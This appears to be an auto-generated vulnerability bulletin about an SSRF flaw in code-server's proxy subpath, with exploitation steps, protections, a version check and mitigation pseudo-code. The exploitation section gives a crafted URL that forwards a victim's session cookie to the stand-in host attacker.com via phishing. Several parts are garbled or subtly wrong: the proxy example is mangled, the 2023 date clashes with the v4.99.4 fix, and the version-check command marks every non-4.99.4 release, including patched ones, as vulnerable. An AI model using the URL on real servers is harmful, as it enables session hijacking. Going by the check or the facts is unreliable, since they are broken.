Listen to this Post
How the CVE Works
The vulnerability arises due to improper validation of the proxy subpath in code-server. When a user accesses a maliciously crafted URL like https://<code-server>/proxy/[email protected]/path, the server fails to restrict the proxied request to local ports. Instead, it forwards the request to an external domain ([email protected]), including the user’s session cookies. This allows an attacker to steal session tokens and gain unauthorized access to the code-server instance, effectively compromising the host machine under the user’s privileges.
DailyCVE Form
Platform: code-server
Version: < v4.99.4
Vulnerability: SSRF
Severity: Critical
Date: 2023-11-30
What Undercode Say:
Exploitation:
1. Craft a malicious URL:
https://victim-server/proxy/attacker.com:80/steal-cookie
2. Trick user into clicking the link (phishing).
3. Intercept session cookie via attacker-controlled server.
Protection:
1. Update to code-server ≥ v4.99.4.
2. Disable proxy if unused (`–disable-proxy` flag).
3. Implement network-level restrictions for outbound proxy traffic.
Detection Commands:
Check code-server version: code-server --version | grep -q "4.99.4" || echo "Vulnerable"
Mitigation Script:
// Validate proxy destinations (pseudo-code):
function sanitizeProxyTarget(url) {
if (url.includes('@') || !url.startsWith('/proxy/localhost:')) {
throw Error("Invalid proxy request");
}
}
Analytics:
- Attack Vector: Network (phishing-dependent).
- Exploit Complexity: Low (no auth required).
- CISA KEV: Likely due to RCE potential.
References:
- GitHub Advisory
- NVD Entry: CVE-2023-5386
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
